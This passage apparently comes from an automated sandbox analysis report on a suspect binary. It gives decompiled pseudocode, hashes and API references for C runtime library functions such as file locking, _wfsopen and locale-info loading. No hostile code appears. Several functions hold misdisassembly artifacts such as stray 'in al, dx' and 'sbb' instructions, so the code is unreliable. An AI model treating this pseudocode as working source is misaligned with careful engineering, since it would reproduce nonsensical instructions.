                • Opcode ID: 97b1a77f0ae4b1df62b12297501d80c3b73afd724fa93faeaa3cde44aa4959b6
                • Instruction ID: 8e7d763c938ff3aabbd027699c607b274108f893b075d8a543be975250439fd3
                • Opcode Fuzzy Hash: 97b1a77f0ae4b1df62b12297501d80c3b73afd724fa93faeaa3cde44aa4959b6
                • Instruction Fuzzy Hash: 1051B830E003059BDB289FA998845AE77A5AF5E328F149729F435BE3D0E770BD509B50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EAE6A2 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 119 eae6a2-eae6b6 call eaf1e0 122 eae6b8-eae6bb 119->122 123 eae6e9 119->123 122->123 125 eae6bd-eae6c2 122->125 124 eae6eb-eae6f0 call eaf225 123->124 127 eae6f1-eae708 call eaec39 call eae4c2 125->127 128 eae6c4-eae6c8 125->128 140 eae70d-eae723 call eae72b 127->140 129 eae6ca-eae6d6 call eae740 128->129 130 eae6d9-eae6e4 call eaf100 call eaeb1e 128->130 129->130 130->123 140->124
                C-Code - Quality: 89%
                			E00EAE6A2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0xecc0b0);
				E00EAF1E0(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E00EAEC39(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E00EAE4C2( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E00EAE72B(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E00EAE740( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E00EAF100())) = 0x16;
						E00EAEB1E();
						goto L6;
					}
				}
				return E00EAF225(_t16);
			}







                0x00eae6a2
                0x00eae6a4
                0x00eae6a9
                0x00eae6b0
                0x00eae6b6
                0x00eae6e9
                0x00eae6e9
                0x00eae6bd
                0x00eae6bd
                0x00eae6c2
                0x00eae6f2
                0x00eae6f8
                0x00eae708
                0x00eae710
                0x00eae712
                0x00eae715
                0x00eae71c
                0x00eae721
                0x00eae6c4
                0x00eae6c8
                0x00eae6d1
                0x00eae6d6
                0x00eae6de
                0x00eae6e4
                0x00000000
                0x00eae6e4
                0x00eae6c2
                0x00eae6f0

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __lock_file_memset
                • String ID:
                • API String ID: 26237723-0
                • Opcode ID: 470dfcb0839a150af0b0cea2206ee62485d3122d3d0d51621fcfa8676eab17ef
                • Instruction ID: 4a0b97bab2639f33b7b9b5d401ce297b9ca3f698b35f2fda6f13a8c244a08545
                • Opcode Fuzzy Hash: 470dfcb0839a150af0b0cea2206ee62485d3122d3d0d51621fcfa8676eab17ef
                • Instruction Fuzzy Hash: BE01D031800605EBCF11AFA5DC0299E7BE1AF9A360F149515F4143F391D7759A11DF91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EAE383 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 143 eae383-eae397 call eae3dd
                C-Code - Quality: 25%
                			E00EAE383(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E00EAE3DD(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                0x00eae386
                0x00eae388
                0x00eae38b
                0x00eae38e
                0x00eae397

                APIs
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: __wfsopen
                • String ID:
                • API String ID: 197181222-0
                • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction ID: 53ea4ac7243d679f710a9bd4333b347f0f2c145413b2a47b2ef55c5477527194
                • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                • Instruction Fuzzy Hash: 6FB0927244020C77DE012A82EC02A593B9A9B45660F408060FB0C2D261A6B3B6649689
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Function 00EA4194 Relevance: 80.0, APIs: 53, Instructions: 498COMMON
                Download Yara Rule
                C-Code - Quality: 92%
                			E00EA4194(intOrPtr* __eax, void* __edx, void* __edi, signed int __esi) {
				void* __ebx;
				signed int _t268;
				void* _t269;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t289;
				signed int _t290;
				signed int _t291;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				signed int _t323;
				signed int _t324;
				signed int _t325;
				signed int _t326;
				void* _t328;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
				_push(_t269);
				_push(1);
				_push(_t328 - 8);
				_t275 = __esi | E00EB4CB1(_t269, __edi, __esi);
				_t276 = _t275 | E00EB4CB1(_t269, __edi, _t275, _t328 - 8, 1, _t269, 0x41, __edi + 0x8c);
				_t277 = _t276 | E00EB4CB1(_t269, __edi, _t276, _t328 - 8, 1, _t269, 0x42, __edi + 0x90);
				_t278 = _t277 | E00EB4CB1(_t269, __edi, _t277, _t328 - 8, 1, _t269, 0x43, __edi + 0x94);
				_t279 = _t278 | E00EB4CB1(_t269, __edi, _t278, _t328 - 8, 1, _t269, 0x28, __edi + 0x98);
				_t280 = _t279 | E00EB4CB1(_t269, __edi, _t279, _t328 - 8, 1, _t269, 0x29, __edi + 0x9c);
				_t281 = _t280 | E00EB4CB1(_t269, __edi, _t280, _t328 - 8, 1, _t269, 0x1f, __edi + 0xa0);
				_t282 = _t281 | E00EB4CB1(_t269, __edi, _t281, _t328 - 8, 1, _t269, 0x20, __edi + 0xa4);
				_t283 = _t282 | E00EB4CB1(_t269, __edi, _t282, _t328 - 8, 1, _t269, 0x1003, __edi + 0xa8);
				_t284 = _t283 | E00EB4CB1(_t269, __edi, _t283, _t328 - 8, 0, _t269, 0x1009, __edi + 0xac);
				_t285 = _t284 | E00EB4CB1(_t269, __edi, _t284, _t328 - 8, 2, _t269, 0x31, __edi + 0xb8);
				_t286 = _t285 | E00EB4CB1(_t269, __edi, _t285, _t328 - 8, 2, _t269, 0x32, __edi + 0xbc);
				_t287 = _t286 | E00EB4CB1(_t269, __edi, _t286, _t328 - 8, 2, _t269, 0x33, __edi + 0xc0);
				_t288 = _t287 | E00EB4CB1(_t269, __edi, _t287, _t328 - 8, 2, _t269, 0x34, __edi + 0xc4);
				_t289 = _t288 | E00EB4CB1(_t269, __edi, _t288, _t328 - 8, 2, _t269, 0x35, __edi + 0xc8);
				_t290 = _t289 | E00EB4CB1(_t269, __edi, _t289, _t328 - 8, 2, _t269, 0x36, __edi + 0xcc);
				_t291 = _t290 | E00EB4CB1(_t269, __edi, _t290, _t328 - 8, 2, _t269, 0x37, __edi + 0xb4);
				_t292 = _t291 | E00EB4CB1(_t269, __edi, _t291, _t328 - 8, 2, _t269, 0x2a, __edi + 0xd4);
				_t293 = _t292 | E00EB4CB1(_t269, __edi, _t292, _t328 - 8, 2, _t269, 0x2b, __edi + 0xd8);
				_t294 = _t293 | E00EB4CB1(_t269, __edi, _t293, _t328 - 8, 2, _t269, 0x2c, __edi + 0xdc);
				_t295 = _t294 | E00EB4CB1(_t269, __edi, _t294, _t328 - 8, 2, _t269, 0x2d, __edi + 0xe0);
				_t296 = _t295 | E00EB4CB1(_t269, __edi, _t295, _t328 - 8, 2, _t269, 0x2e, __edi + 0xe4);
				_t297 = _t296 | E00EB4CB1(_t269, __edi, _t296, _t328 - 8, 2, _t269, 0x2f, __edi + 0xe8);
				_t298 = _t297 | E00EB4CB1(_t269, __edi, _t297, _t328 - 8, 2, _t269, 0x30, __edi + 0xd0);
				_t299 = _t298 | E00EB4CB1(_t269, __edi, _t298, _t328 - 8, 2, _t269, 0x44, __edi + 0xec);
				_t300 = _t299 | E00EB4CB1(_t269, __edi, _t299, _t328 - 8, 2, _t269, 0x45, __edi + 0xf0);
				_t301 = _t300 | E00EB4CB1(_t269, __edi, _t300, _t328 - 8, 2, _t269, 0x46, __edi + 0xf4);
				_t302 = _t301 | E00EB4CB1(_t269, __edi, _t301, _t328 - 8, 2, _t269, 0x47, __edi + 0xf8);
				_t303 = _t302 | E00EB4CB1(_t269, __edi, _t302, _t328 - 8, 2, _t269, 0x48, __edi + 0xfc);
				_t304 = _t303 | E00EB4CB1(_t269, __edi, _t303, _t328 - 8, 2, _t269, 0x49, __edi + 0x100);
				_t305 = _t304 | E00EB4CB1(_t269, __edi, _t304, _t328 - 8, 2, _t269, 0x4a, __edi + 0x104);
				_t306 = _t305 | E00EB4CB1(_t269, __edi, _t305, _t328 - 8, 2, _t269, 0x4b, __edi + 0x108);
				_t307 = _t306 | E00EB4CB1(_t269, __edi, _t306, _t328 - 8, 2, _t269, 0x4c, __edi + 0x10c);
				_t308 = _t307 | E00EB4CB1(_t269, __edi, _t307, _t328 - 8, 2, _t269, 0x4d, __edi + 0x110);
				_t309 = _t308 | E00EB4CB1(_t269, __edi, _t308, _t328 - 8, 2, _t269, 0x4e, __edi + 0x114);
				_t310 = _t309 | E00EB4CB1(_t269, __edi, _t309, _t328 - 8, 2, _t269, 0x4f, __edi + 0x118);
				_t311 = _t310 | E00EB4CB1(_t269, __edi, _t310, _t328 - 8, 2, _t269, 0x38, __edi + 0x11c);
				_t312 = _t311 | E00EB4CB1(_t269, __edi, _t311, _t328 - 8, 2, _t269, 0x39, __edi + 0x120);
				_t313 = _t312 | E00EB4CB1(_t269, __edi, _t312, _t328 - 8, 2, _t269, 0x3a, __edi + 0x124);
				_t314 = _t313 | E00EB4CB1(_t269, __edi, _t313, _t328 - 8, 2, _t269, 0x3b, __edi + 0x128);
				_t315 = _t314 | E00EB4CB1(_t269, __edi, _t314, _t328 - 8, 2, _t269, 0x3c, __edi + 0x12c);
				_t316 = _t315 | E00EB4CB1(_t269, __edi, _t315, _t328 - 8, 2, _t269, 0x3d, __edi + 0x130);
				_t317 = _t316 | E00EB4CB1(_t269, __edi, _t316, _t328 - 8, 2, _t269, 0x3e, __edi + 0x134);
				_t318 = _t317 | E00EB4CB1(_t269, __edi, _t317, _t328 - 8, 2, _t269, 0x3f, __edi + 0x138);
				_t319 = _t318 | E00EB4CB1(_t269, __edi, _t318, _t328 - 8, 2, _t269, 0x40, __edi + 0x13c);
				_t320 = _t319 | E00EB4CB1(_t269, __edi, _t319, _t328 - 8, 2, _t269, 0x41, __edi + 0x140);
				_t321 = _t320 | E00EB4CB1(_t269, __edi, _t320, _t328 - 8, 2, _t269, 0x42, __edi + 0x144);
				_t322 = _t321 | E00EB4CB1(_t269, __edi, _t321, _t328 - 8, 2, _t269, 0x43, __edi + 0x148);
				_t323 = _t322 | E00EB4CB1(_t269, __edi, _t322, _t328 - 8, 2, _t269, 0x28, __edi + 0x14c);
				_t324 = _t323 | E00EB4CB1(_t269, __edi, _t323, _t328 - 8, 2, _t269, 0x29, __edi + 0x150);
				_t325 = _t324 | E00EB4CB1(_t269, __edi, _t324, _t328 - 8, 2, _t269, 0x1f, __edi + 0x154);
				_t326 = _t325 | E00EB4CB1(_t269, __edi, _t325, _t328 - 8, 2, _t269, 0x20, __edi + 0x158);
				_t268 = E00EB4CB1(_t269, __edi, _t326, _t328 - 8, 2, _t269, 0x1003, __edi + 0x15c) | _t326;
				return _t268;
			}



























































                0x00eb929c
                0x00eb929e
                0x00eb92a2
                0x00eb92a3
                0x00eb92a8
                0x00eb92b1
                0x00eb92c8
                0x00eb92df
                0x00eb92f6
                0x00eb9310
                0x00eb9327
                0x00eb933e
                0x00eb9355
                0x00eb9372
                0x00eb938c
                0x00eb93a3
                0x00eb93ba
                0x00eb93d4
                0x00eb93eb
                0x00eb9402
                0x00eb9419
                0x00eb9433
                0x00eb944a
                0x00eb9461
                0x00eb9478
                0x00eb9492
                0x00eb94a9
                0x00eb94c0
                0x00eb94d7
                0x00eb94f1
                0x00eb9508
                0x00eb951f
                0x00eb9536
                0x00eb9550
                0x00eb9567
                0x00eb957e
                0x00eb9595
                0x00eb95af
                0x00eb95c6
                0x00eb95dd
                0x00eb95f4
                0x00eb960e
                0x00eb9625
                0x00eb963c
                0x00eb9653
                0x00eb966d
                0x00eb9684
                0x00eb969b
                0x00eb96b2
                0x00eb96cc
                0x00eb96e3
                0x00eb96fa
                0x00eb9711
                0x00eb972b
                0x00eb9742
                0x00eb9759
                0x00eb9770
                0x00eb978d
                0x00eb9795

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB92A9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D35
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D4A
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D77
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4D8C
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DA4
                • ___getlocaleinfo.LIBCMT ref: 00EB92C3
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4DE4
                  • Part of subcall function 00EB4CB1: __calloc_crt.LIBCMT ref: 00EB4E0E
                  • Part of subcall function 00EB4CB1: _free.LIBCMT ref: 00EB4E34
                  • Part of subcall function 00EB4CB1: __invoke_watson.LIBCMT ref: 00EB4E84
                • ___getlocaleinfo.LIBCMT ref: 00EB92DA
                • ___getlocaleinfo.LIBCMT ref: 00EB92F1
                • ___getlocaleinfo.LIBCMT ref: 00EB9308
                • ___getlocaleinfo.LIBCMT ref: 00EB9322
                • ___getlocaleinfo.LIBCMT ref: 00EB9339
                • ___getlocaleinfo.LIBCMT ref: 00EB9350
                • ___getlocaleinfo.LIBCMT ref: 00EB936A
                • ___getlocaleinfo.LIBCMT ref: 00EB9387
                • ___getlocaleinfo.LIBCMT ref: 00EB939E
                • ___getlocaleinfo.LIBCMT ref: 00EB93B5
                • ___getlocaleinfo.LIBCMT ref: 00EB93CC
                • ___getlocaleinfo.LIBCMT ref: 00EB93E6
                • ___getlocaleinfo.LIBCMT ref: 00EB93FD
                • ___getlocaleinfo.LIBCMT ref: 00EB9414
                • ___getlocaleinfo.LIBCMT ref: 00EB942B
                • ___getlocaleinfo.LIBCMT ref: 00EB9445
                • ___getlocaleinfo.LIBCMT ref: 00EB945C
                • ___getlocaleinfo.LIBCMT ref: 00EB9473
                • ___getlocaleinfo.LIBCMT ref: 00EB948A
                • ___getlocaleinfo.LIBCMT ref: 00EB94A4
                • ___getlocaleinfo.LIBCMT ref: 00EB94BB
                • ___getlocaleinfo.LIBCMT ref: 00EB94D2
                • ___getlocaleinfo.LIBCMT ref: 00EB94E9
                • ___getlocaleinfo.LIBCMT ref: 00EB9503
                • ___getlocaleinfo.LIBCMT ref: 00EB951A
                • ___getlocaleinfo.LIBCMT ref: 00EB9531
                • ___getlocaleinfo.LIBCMT ref: 00EB9548
                • ___getlocaleinfo.LIBCMT ref: 00EB9562
                • ___getlocaleinfo.LIBCMT ref: 00EB9579
                • ___getlocaleinfo.LIBCMT ref: 00EB9590
                • ___getlocaleinfo.LIBCMT ref: 00EB95A7
                • ___getlocaleinfo.LIBCMT ref: 00EB95C1
                • ___getlocaleinfo.LIBCMT ref: 00EB95D8
                • ___getlocaleinfo.LIBCMT ref: 00EB95EF
                • ___getlocaleinfo.LIBCMT ref: 00EB9606
                • ___getlocaleinfo.LIBCMT ref: 00EB9620
                • ___getlocaleinfo.LIBCMT ref: 00EB9637
                • ___getlocaleinfo.LIBCMT ref: 00EB964E
                • ___getlocaleinfo.LIBCMT ref: 00EB9665
                • ___getlocaleinfo.LIBCMT ref: 00EB967F
                • ___getlocaleinfo.LIBCMT ref: 00EB9696
                • ___getlocaleinfo.LIBCMT ref: 00EB96AD
                • ___getlocaleinfo.LIBCMT ref: 00EB96C4
                • ___getlocaleinfo.LIBCMT ref: 00EB96DE
                • ___getlocaleinfo.LIBCMT ref: 00EB96F5
                • ___getlocaleinfo.LIBCMT ref: 00EB970C
                • ___getlocaleinfo.LIBCMT ref: 00EB9723
                • ___getlocaleinfo.LIBCMT ref: 00EB973D
                • ___getlocaleinfo.LIBCMT ref: 00EB9754
                • ___getlocaleinfo.LIBCMT ref: 00EB976B
                • ___getlocaleinfo.LIBCMT ref: 00EB9785
                Memory Dump Source
                • Source File: 00000001.00000002.448099573.0000000000EA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00EA0000, based on PE: true
                • Associated: 00000001.00000002.448093197.0000000000EA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448197888.0000000000EC7000.00000002.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448222329.0000000000ECE000.00000004.00000001.01000000.00000004.sdmpDownload File
                • Associated: 00000001.00000002.448230622.0000000000ED2000.00000002.00000001.01000000.00000004.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_ea0000_zrztlh.jbxd
                Similarity
                • API ID: ___getlocaleinfo$InfoLocale___crt__calloc_crt_free$ErrorLast__invoke_watson
                • String ID:
                • API String ID: 2187842456-0
                • Opcode ID: e3b57d8fdd040759e5965ee81e5fb9311759b06fcb6a17c9cdf6db9e33a1ee90
                • Instruction ID: 119438a1228bf96623d1cbdbd932c6f78f2b3f9b673c084a5cf924c451290bd3
                • Opcode Fuzzy Hash: e3b57d8fdd040759e5965ee81e5fb9311759b06fcb6a17c9cdf6db9e33a1ee90
                • Instruction Fuzzy Hash: 1EF1C7F7E412097AF72696E08C86FEBF7ECA704B40F145622F715F60C2FAA4665446A0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00EA26FB Relevance: 36.2, APIs: 24, Instructions: 229COMMON
                Download Yara Rule
                C-Code - Quality: 76%
                			E00EA26FB(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t86;
				char _t153;
				void* _t167;
				void* _t180;
				void* _t187;
				char* _t193;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				signed int _t218;
				intOrPtr* _t219;
				char* _t221;
				void* _t222;
				void* _t223;

				_t180 = __ebx;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + 0x6a)) =  *((intOrPtr*)(__eax + 0x6a)) + __edx;
				asm("adc eax, 0xec458d57");
				_push(1);
				_push(__eax);
				_t199 = E00EB4CB1(__ebx, __edi, __esi);
				_t200 = _t199 | E00EB4CB1(__ebx, __edi, _t199, _t222 - 0x14, 1, __edi, 0x14,  *((intOrPtr*)(_t222 + 8)) + 0x10);
				_t201 = _t200 | E00EB4CB1(__ebx, __edi, _t200, _t222 - 0x14, 1, __edi, 0x16,  *((intOrPtr*)(_t222 + 8)) + 0x14);
				_t202 = _t201 | E00EB4CB1(__ebx, __edi, _t201, _t222 - 0x14, 1, __edi, 0x17,  *((intOrPtr*)(_t222 + 8)) + 0x18);
				_t86 =  *((intOrPtr*)(_t222 + 8)) + 0x1c;
				 *((intOrPtr*)(_t222 - 0xc)) = _t86;
				_push(_t86);
				_push(0x18);
				asm("sbb [edi-0x73], dl");
				_t223 = _t222 + 1;
				asm("in al, dx");
				_push(1);
				_push(_t86);
				_t203 = _t202 | E00EB4CB1(__ebx, __edi, _t202);
				_t204 = _t203 | E00EB4CB1(__ebx, __edi, _t203, _t223 - 0x14, 1, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x20);
				_t205 = _t204 | E00EB4CB1(__ebx, __edi, _t204, _t223 - 0x14, 1, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x24);
				_t206 = _t205 | E00EB4CB1(__ebx, __edi, _t205, _t223 - 0x14, 0, __edi, 0x1a,  *((intOrPtr*)(_t223 + 8)) + 0x28);
				_t207 = _t206 | E00EB4CB1(__ebx, __edi, _t206, _t223 - 0x14, 0, __edi, 0x19,  *((intOrPtr*)(_t223 + 8)) + 0x29);
				_t208 = _t207 | E00EB4CB1(__ebx, __edi, _t207, _t223 - 0x14, 0, __edi, 0x54,  *((intOrPtr*)(_t223 + 8)) + 0x2a);
				_t209 = _t208 | E00EB4CB1(__ebx, __edi, _t208, _t223 - 0x14, 0, __edi, 0x55,  *((intOrPtr*)(_t223 + 8)) + 0x2b);
				_t210 = _t209 | E00EB4CB1(__ebx, __edi, _t209, _t223 - 0x14, 0, __edi, 0x56,  *((intOrPtr*)(_t223 + 8)) + 0x2c);
				_t211 = _t210 | E00EB4CB1(__ebx, __edi, _t210, _t223 - 0x14, 0, __edi, 0x57,  *((intOrPtr*)(_t223 + 8)) + 0x2d);
				_t212 = _t211 | E00EB4CB1(__ebx, __edi, _t211, _t223 - 0x14, 0, __edi, 0x52,  *((intOrPtr*)(_t223 + 8)) + 0x2e);
				_t213 = _t212 | E00EB4CB1(__ebx, __edi, _t212, _t223 - 0x14, 0, __edi, 0x53,  *((intOrPtr*)(_t223 + 8)) + 0x2f);
				_t214 = _t213 | E00EB4CB1(__ebx, __edi, _t213, _t223 - 0x14, 2, __edi, 0x15,  *((intOrPtr*)(_t223 + 8)) + 0x38);
				_t215 = _t214 | E00EB4CB1(__ebx, __edi, _t214, _t223 - 0x14, 2, __edi, 0x14,  *((intOrPtr*)(_t223 + 8)) + 0x3c);
				_t216 = _t215 | E00EB4CB1(__ebx, __edi, _t215, _t223 - 0x14, 2, __edi, 0x16,  *((intOrPtr*)(_t223 + 8)) + 0x40);
				_t217 = _t216 | E00EB4CB1(__ebx, __edi, _t216, _t223 - 0x14, 2, __edi, 0x17,  *((intOrPtr*)(_t223 + 8)) + 0x44);
				_t218 = _t217 | E00EB4CB1(__ebx, __edi, _t217, _t223 - 0x14, 2, __edi, 0x50,  *((intOrPtr*)(_t223 + 8)) + 0x48);
				if((E00EB4CB1(__ebx, __edi, _t218, _t223 - 0x14, 2, __edi, 0x51,  *((intOrPtr*)(_t223 + 8)) + 0x4c) | _t218) == 0) {
					_t193 =  *((intOrPtr*)( *((intOrPtr*)(_t223 - 0xc))));
					while( *_t193 != 0) {
						_t153 =  *_t193;
						if(_t153 < 0x30 || _t153 > 0x39) {
							if(_t153 != 0x3b) {
								goto L9;
							} else {
								_t221 = _t193;
								do {
									 *_t221 =  *((intOrPtr*)(_t221 + 1));
									_t221 = _t221 + 1;
								} while ( *_t221 != 0);
								continue;
							}
							L18:
							_t187 = 0xffffffffffffffff;
							if( *((intOrPtr*)(_t180 + 0x80)) != 0) {
								asm("lock xadd [edx], eax");
							}
							if( *((intOrPtr*)(_t180 + 0x78)) != 0) {
								asm("lock xadd [eax], ecx");
								if(_t187 == 1) {
									E00EB2248( *((intOrPtr*)(_t180 + 0x84)));
									E00EB2248( *((intOrPtr*)(_t180 + 0x78)));
								}
							}
							 *((intOrPtr*)(_t180 + 0x78)) =  *((intOrPtr*)(_t223 - 4));
							_t167 = 0;
							 *((intOrPtr*)(_t180 + 0x80)) = _t196;
							 *((intOrPtr*)(_t180 + 0x84)) = _t219;
							goto L24;
						} else {
							 *_t193 = _t153 - 0x30;
							L9:
							_t193 = _t193 + 1;
						}
					}
					_t219 =  *((intOrPtr*)(_t223 + 8));
					_t196 =  *((intOrPtr*)(_t223 - 8));
					 *_t219 =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84))));
					 *((intOrPtr*)(_t219 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 4));
					 *((intOrPtr*)(_t219 + 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 8));
					 *((intOrPtr*)(_t219 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x30));
					 *((intOrPtr*)(_t219 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t180 + 0x84)) + 0x34));
					 *((intOrPtr*)( *((intOrPtr*)(_t223 - 4)))) = 1;
					if(_t196 != 0) {
						 *_t196 = 1;
					}
					goto L18;
				} else {
					E00EB842D( *((intOrPtr*)(_t223 + 8)));
					E00EB2248( *((intOrPtr*)(_t223 + 8)));
					E00EB2248( *((intOrPtr*)(_t223 - 4)));
					E00EB2248( *((intOrPtr*)(_t223 - 8)));
					_t167 = 1;
				}
				L24:
				return _t167;
			}


































                0x00ea26fb
                0x00eb85cc
                0x00eb85ce
                0x00eb85d1
                0x00eb85d6
                0x00eb85d8
                0x00eb85e1
                0x00eb85f5
                0x00eb860c
                0x00eb8626
                0x00eb862b
                0x00eb862e
                0x00eb8631
                0x00eb8632
                0x00eb8633
                0x00eb8636
                0x00eb8637
                0x00eb8638
                0x00eb863a
                0x00eb8640
                0x00eb8657
                0x00eb866e
                0x00eb8688
                0x00eb869f
                0x00eb86b6
                0x00eb86cd
                0x00eb86e7
                0x00eb86fe
                0x00eb8715
                0x00eb872c
                0x00eb8746
                0x00eb875d
                0x00eb8774
                0x00eb878b
                0x00eb87a5
                0x00eb87c1
                0x00eb87ef
                0x00eb8802
                0x00eb87f3
                0x00eb87f7
                0x00eb880b
                0x00000000
                0x00eb880d
                0x00eb880d
                0x00eb880f
                0x00eb8812
                0x00eb8814
                0x00eb8817
                0x00000000
                0x00eb881c
                0x00eb8879
                0x00eb887f
                0x00eb8884
                0x00eb8888
                0x00eb8888
                0x00eb8891
                0x00eb8893
                0x00eb8898
                0x00eb88a0
                0x00eb88a8
                0x00eb88ae
                0x00eb8898
                0x00eb88b2
                0x00eb88b5
                0x00eb88b7
                0x00eb88bd
                0x00000000
                0x00eb87fd
                0x00eb87ff
                0x00eb8801
                0x00eb8801
                0x00eb8801
                0x00eb87f7
                0x00eb8833
                0x00eb8837
                0x00eb883c
                0x00eb8847
                0x00eb8853
                0x00eb885f
                0x00eb886b
                0x00eb8871
                0x00eb8875
                0x00eb8877
                0x00eb8877
                0x00000000
                0x00eb87c3
                0x00eb87c7
                0x00eb87cd
                0x00eb87d6
                0x00eb87df
                0x00eb8575
                0x00eb8575
                0x00eb88c3
                0x00eb88c9

                APIs
                • ___getlocaleinfo.LIBCMT ref: 00EB85D9
                  • Part of subcall function 00EB4CB1: ___crtGetLocaleInfoA.LIBCMT ref: 00EB4D03
                  • Part of subcall function 00EB4CB1: GetLastError.KERNEL32 ref: 00EB4D15
